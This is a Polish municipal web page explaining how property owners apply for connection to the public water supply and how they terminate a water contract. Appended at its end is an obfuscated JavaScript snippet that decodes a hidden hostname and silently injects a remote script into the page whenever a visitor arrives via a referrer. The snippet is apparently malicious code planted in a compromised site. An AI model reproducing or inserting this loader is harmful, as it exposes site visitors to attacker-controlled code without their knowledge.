Zaopatrrzenie w wodę.

Kinga Trzaska

Tel. (+48 86) 4769 010 w. 22

e-mail: 

Pokój nr 7

Informacje i druki do pobrania
Procedura przyłączenia do sieci wodociągowej

Procedura przyłączenia do sieci wodociągowej

1. Inwestor – składa wniosek o wydanie warunków włączenia do sieci wodociągowej wraz z załącznikami:
– egzemplarz szkicu sytuacyjnego lub planu zabudowy

Wniosek można pobrać na stronie (pobierz tutaj) lub wypełnić na miejscu po uprzednim pobraniu w pokoju 7 .

2. Inwestor – odbiera warunki przyłączenia do sieci wodociągowej lin otrzymuje je pocztą.
Wydanie warunków włączenia do sieci wodociągowej jest bezpłatne.

3. Inwestor –wykonuje plan sytuacyjny przyłącza wodociągowego lub zleca wykonanie dowolnemu projektantowi instalacji i sieci sanitarnych.

4. Inwestor – zleca wykonanie przyłącza wodociągowego dowolnemu wykonawcy lub wykonuje prace we własnym zakresie.

5. Inwestor/Wykonawca – zgłasza zamiar przystąpienia do wykonywania przyłącza wodociągowego do zgłoszenia należy dołączyć kopię mapy zasadniczej z naniesioną trasą przyłącza (plan sytuacyjny).

6. Gmina – dokonuje odbioru przyłącza wodociągowego, montuje o plombuje wodomierz, oraz sporządza protokół odbioru.

7. Inwestor – podpisuje umowę na dostarczanie wody (wniosek pobierz tutaj) Następnie dostarcza inwentaryzację powykonawczą przyłącza wodociągowego.

8. Jeśli chcesz rozwiązać umowę. Wniosek o rozwiązanie umowy na dostawę wody można złożyć na naszym formularzu (pobierz załącznik) lub dostarczyć własne pismo, pod warunkiem że będzie zawierało informacje tożsame z treścią w naszym formularzu. Wniosek możesz złożyć osobiście, za pośrednictwem poczty tradycyjnej lub poczty elektronicznej. Do wniosku należy dołączyć kserokopię lub skan:

dokumentu potwierdzającego sprzedaż nieruchomości;
protokołu zdawczo-odbiorczym ze stanami wodomierzy na dzień przejęcia/przekazania nieruchomości.

Przejdź do zakładki Druki do pobrania

Ogłoszenia:

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);